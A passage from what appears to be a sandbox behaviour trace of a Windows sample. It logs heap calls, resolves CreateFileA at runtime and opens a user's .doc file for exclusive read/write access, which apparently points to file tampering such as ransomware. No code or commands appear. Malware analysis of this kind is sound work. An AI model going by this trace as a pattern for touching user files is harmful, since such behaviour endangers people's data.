hHeap=0x770000) returned 1 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.835] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.837] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.840] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889c10 [0035.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889c10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.840] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0035.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889c10 [0035.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0035.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.841] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0035.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0035.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc", cchWideChar=86, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 86 [0035.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56) returned 0x794b90 [0035.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc", cchWideChar=86, lpMultiByteStr=0x794b90, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc", lpUsedDefaultChar=0x0) returned 86 [0035.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0035.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.842] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\oy6qw7y-w3iuu.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=86, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xac) returned 0x7c5758 [0035.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=86, lpWideCharStr=0x7c5758, cchWideChar=86 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc") returned 86 [0035.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0035.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0035.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 